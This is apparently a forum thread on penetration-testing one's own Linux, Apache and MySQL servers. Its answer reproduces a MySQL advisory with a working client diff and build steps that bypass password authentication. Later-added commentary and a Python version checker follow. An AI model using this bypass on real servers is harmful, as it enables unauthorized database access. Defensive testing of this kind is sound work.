chigs20
asked on
How to hack my server
To all,
I would like to try to hack our dev servers (they are a replication of our production servers). We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables. But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure. We already do port scanning to ensure there aren't any extra open ports that aren't being used. Are there applications that I can use for password hacking? etc. Thanks for the help in advance.
Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
ASKER CERTIFIED SOLUTION
Give nessus a go. http://www.nessus.org/
The version of MySQL is vulnerable to a NULL password:
Vulnerable Systems:
* MySQL version 4.1 up to but not including 4.1.3
* MySQL version 5.0
Immune Systems:
* MySQL version 4.1.3
The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:
* Download and unpack the MySQL 5.0.0-alpha source
* Patch the sql-common/client.c file:
sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
* Configure and Make as usual
The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilitie s & CLIENT_SECURE_CONNECTION)
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;
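Review bot: in the replacement lines 1941-1942, `sprintf(end,"\x14\x00")` has its format string cut off at the embedded NUL, so sprintf itself writes only the single 0x14 byte and the second byte is the string terminator it appends; the following `end+=2` is what skips both, which works but is easy to misread. The removed block (the CLIENT_SECURE_CONNECTION branch, the scramble_323 fallback and the empty-password case) is gone entirely, so this client no longer derives anything from `passwd` or from `mysql->scramble`, which matches the description of the resulting binary above. From the asker's side the more useful observation is that the Vulnerable Systems list names 4.1 before 4.1.3 and 5.0, while the stated dev server runs MySQL 4.0.2, so this test does not apply to that build; the listed fix is 4.1.3.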
Also, to check your security, use a password cracker on your own system and see if it can crack them.
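A small version-range check, added here as an example and not part of the original thread, that applies the advisory's Vulnerable/Immune lists above to a server inventory. The host names and version strings are constructed; treating "5.0" as the whole 5.0.x series is my assumption.

```python
import re

# Ranges taken from the advisory quoted above (half-open: lo <= v < hi).
# 4.1.0 up to but not including 4.1.3 is vulnerable; 4.1.3 is immune.
# Assumption: "MySQL version 5.0" means every 5.0.x release.
VULNERABLE_RANGES = [
    ((4, 1, 0), (4, 1, 3)),
    ((5, 0, 0), (5, 1, 0)),
]

# MySQL reports versions with suffixes, e.g. "5.0.0-alpha", "4.0.20-standard-log".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(banner):
    """Return (major, minor, patch) from a server version string.

    Suffixes such as '-alpha' or '-standard-log' are ignored; anything that
    does not start with three dotted integers raises ValueError.
    """
    m = _VERSION_RE.match(banner.strip())
    if not m:
        raise ValueError("unrecognised version string: %r" % banner)
    return tuple(int(x) for x in m.groups())


def is_affected(banner):
    """True if the version falls inside one of the advisory's vulnerable ranges."""
    v = parse_version(banner)
    return any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)


def audit(inventory):
    """Map each host name to a verdict string for its reported version."""
    return {
        host: ("VULNERABLE: upgrade to 4.1.3 or later" if is_affected(banner)
               else "not in the advisory's affected range")
        for host, banner in inventory.items()
    }


# Constructed sample inventory: the asker's stated 4.0.2 plus versions on
# each side of the advisory's boundaries. These are not real hosts.
SAMPLE_INVENTORY = {
    "dev-db (asker's spec)": "4.0.2",
    "lab-41": "4.1.2-alpha",
    "lab-413": "4.1.3-beta",
    "lab-50": "5.0.0-alpha",
}

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_INVENTORY).items():
        print("%-22s %s" % (host, verdict))
```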
just tell us your ip ;)